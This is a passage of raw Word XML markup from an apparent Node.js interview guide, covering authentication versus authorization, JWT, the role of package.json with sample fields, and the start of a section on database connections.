      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="3BBCB1B4" w14:textId="77777777" w:rsidR="001F151F" w:rsidRPr="00DA2F32" w:rsidRDefault="001F151F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Understanding Authentication vs. Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FA1092" w14:textId="77777777" w:rsidR="001F151F" w:rsidRPr="00DA2F32" w:rsidRDefault="001F151F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Authentication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verifying the identity of a user (e.g., logging in with a username and password).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245A8423" w14:textId="77777777" w:rsidR="001F151F" w:rsidRPr="00DA2F32" w:rsidRDefault="001F151F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Authorization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Determining what resources or actions an authenticated user is allowed to access or perform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8BF70D" w14:textId="77777777" w:rsidR="001F151F" w:rsidRPr="00DA2F32" w:rsidRDefault="001F151F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Choosing an Authentication Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77917A5F" w14:textId="77777777" w:rsidR="001F151F" w:rsidRPr="00DA2F32" w:rsidRDefault="001F151F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Session-based Authentication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stores user information on the server in sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231087BF" w14:textId="77777777" w:rsidR="001F151F" w:rsidRPr="00DA2F32" w:rsidRDefault="001F151F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Token-based Authentication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses tokens (e.g., JWT) that clients store and send with each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C348054" w14:textId="77777777" w:rsidR="001F151F" w:rsidRPr="00DA2F32" w:rsidRDefault="001F151F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>OAuth2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> For third-party authentication using providers like Google, Facebook, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152BFD78" w14:textId="77777777" w:rsidR="001F151F" w:rsidRPr="00DA2F32" w:rsidRDefault="001F151F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Implementing JWT Authentication and Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C8A868" w14:textId="70798889" w:rsidR="001F151F" w:rsidRPr="00DA2F32" w:rsidRDefault="001F151F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Why JWT?</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSON Web Tokens are stateless and scalable, making them a popular choice for modern APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D4AA2E"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33" w:name="_Toc178383216"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q32. What is the purpose of the package.json file in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="199F84E7" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The package.json file is a critical component in any Node.js project. It serves as the manifest for your application, providing essential information about the project and managing dependencies, scripts, and configurations. Here’s an overview of its key purposes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BA568E"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1. Project Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629747BF" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The package.json file contains basic information about the project, such as its name, version, description, and author.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365340A8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E43916"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"my-node-app",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786EC27A"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"version": "1.0.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C27B915"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"description": "A sample Node.js application",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF430B9"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"author": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FDF7BB"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"license": "MIT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E15A88F"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FF057E2"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2. Dependency Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32683C17" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>package.json specifies the dependencies (libraries, frameworks, tools) your project needs to function. When you run npm install, npm reads this file to install the required packages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBA9478"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9DE64E8"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"dependencies": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D203A7"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"express": "^4.17.1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE302AC"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"mongoose": "^6.0.12"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EA54A1"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5BD7DA8"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18A4F59" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DevDependencies:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> These are dependencies required only for development (e.g., testing libraries, linters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B4AAF4"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C0F3E9D"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"devDependencies": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE1DD10"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"mocha": "^9.1.3",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EA61FD"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"chai": "^4.3.4"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE0312"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C88B36A"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357B63C"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3. Script Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F6F5A3" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You can define custom scripts to automate tasks like running tests, building your project, or starting the server. These scripts are executed using npm run &lt;script-name&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72405FC8"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AA76DC6"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"scripts": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742B10FB"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"start": "node app.js",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33375509"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"test": "mocha",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC60AD1"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"build": "webpack --config webpack.config.js"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499D7E2"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CFBB891"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FE466BE"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4. Version Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78467F94" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The package.json file helps maintain version control for both the project itself and its dependencies. This ensures consistent behavior across different environments and helps manage updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43995B02" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Semantic Versioning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dependencies use semantic versioning to define compatible versions. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D453A82" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"^4.17.1": Any 4.x.x version is allowed, but not 5.x.x.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E284D1" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"~4.17.1": Only patches (e.g., 4.17.x) are allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740DF581"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5. Environment Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56903CD0" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You can include configurations or other metadata that tools or libraries may use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B567189"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E4E4660"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"engines": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE8DCA"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"node": "&gt;=14.0.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C27213"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39F07C2"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"browser": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F99AE8"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"http": false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B892D2"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3E54247"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D2C7C46"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6. Private and Public Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA88B81" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>By setting "private": true, you prevent the project from being accidentally published to the npm registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F850D6"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241F930"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"private": true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080158F1"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6BDD95D"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7. Repository and Issue Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C488706" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The package.json can link to your project's repository and issue tracking system, helping contributors find the source code and report bugs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7EA502"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B8CEDD4"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"repository": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688CDAE2"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"type": "git",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB5F1E1"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"url": "https://github.com/username/my-node-app.git"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250D4684"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9570083"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"bugs": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BB4ACC"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"url": "https://github.com/username/my-node-app/issues"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51317091"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872A0AB" w14:textId="7CCE88DE"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A91AE07"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34" w:name="_Toc178383217"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q33. How do you handle database connections in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="355AA5C2"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1. Choosing the Right Database Driver or ORM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7195E614" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL Databases (e.g., MySQL, PostgreSQL):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use drivers like mysql2, pg, or ORMs like Sequelize, TypeORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA88EF8" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NoSQL Databases (e.g., MongoDB):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use drivers like mongodb or ORMs like Mongoose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438183C1"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2. Connecting to the Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA85DC6" w14:textId="77777777" w:rsidR="004B60F6" w:rsidRPr="00DA2F32" w:rsidRDefault="004B60F6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Direct Connection (e.g., MongoDB with mongodb driver):</w:t>
      </w:r>
    </w:p>
